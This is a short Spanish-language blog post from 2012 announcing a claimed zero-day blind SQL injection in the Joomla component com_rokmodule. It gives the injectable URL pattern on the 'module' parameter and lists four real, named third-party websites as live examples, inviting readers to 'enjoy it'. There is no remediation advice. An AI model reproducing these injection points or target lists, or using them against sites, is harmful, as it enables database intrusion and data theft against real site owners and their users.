Bueno laburando encontramos un Bug 0-Day en Joomla, Un Componente que permite La Injeccion SQLi, Normalmente Blind SQli

 

Titulo: Joomla Component RokModule Blind SQLi [module] Vulnerability

Nombre del Componente: Com_rokmodule

Empresa: http://www.rockettheme.com/

Testeado: Linux Backtrack

Autor: Yarolinux

Fecha: 09/09/2012

Bueno la Injeccion Va de la siguiente manera:

http://localhost/index.php?option=com_rokmodule&tmpl=component&type=raw&module=[sqli]

http://localhost/web/index.php?option=com_rokmodule&tmpl=component&type=raw&module=[sqli]or[BlindSQLi]

Ejemplos:

http://motoclubalmeria.com/index.php?option=com_rokmodule&tmpl=component&type=raw&module=

 

http://www.tribune.com.ng/sat/index.php?option=com_rokmodule&tmpl=component&type=raw&module=Sports&offset=
http://endstation-rechts.de/index.php?option=com_rokmodule&tmpl=component&type=raw&module=Schlagzeilen&offset=

http://www.camaradequetzaltenango.com/portal/index.php?option=com_rokmodule&tmpl=component&type=raw&module=

Ok! Eso es todo Difrutenlo!

 

// No Falta el Troll: A diferencia de http://1337day.com/exploits/11721 Ya ese Vulneabilidad no Funciona mucho, ps ya el modulo fue actualizado, y cambiado ahora a “module=” a diferencia de el anterior “moduleid=”

La Injeccion Blind SQLi es 90 Porcierto Probable..

Estamos trabajando en un laboratorio testeandolo en Joomla 1.7, Muy pronto resultados :D

 

Greetz: Dylan Irzi & WebSecurityDev

Acerca de Mi Dylan Irzi

Colombiano, WebMaster, Independent Security Researcher , Apasionado por la Seguridad Informatica, #WhiteHat. Programador. Co-Fundador y DueƱo de WebSecurityDev.com

0Day